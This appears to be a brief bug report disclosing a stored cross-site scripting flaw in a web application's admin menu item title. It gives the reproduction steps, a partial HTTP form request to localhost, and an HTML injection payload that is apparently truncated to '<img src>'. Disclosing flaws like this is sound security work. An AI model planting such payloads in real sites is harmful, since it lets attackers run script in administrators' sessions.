There is Stored XSS in the item title of the menu on the administrator screen.
Step 1. Log in to the admin screen and select Add New Item in Menu.
Step 2. Specify the following Payload for the item title and save it.
Step 3. Once saved, any script can be executed on the administrator screen.
<img src>
POST /admin/menu/item_add/1/40 HTTP/2
Host: localhost
...
-----------------------------270651214445377498288823999
Content-Disposition: form-data; name="title"
<img src>
-----------------------------270651214445377498288823999
...
https://drive.google.com/file/d/1DjT6hbPBXpIs2pbrZ1EZZluZDOSDjeMk/view?usp=sharing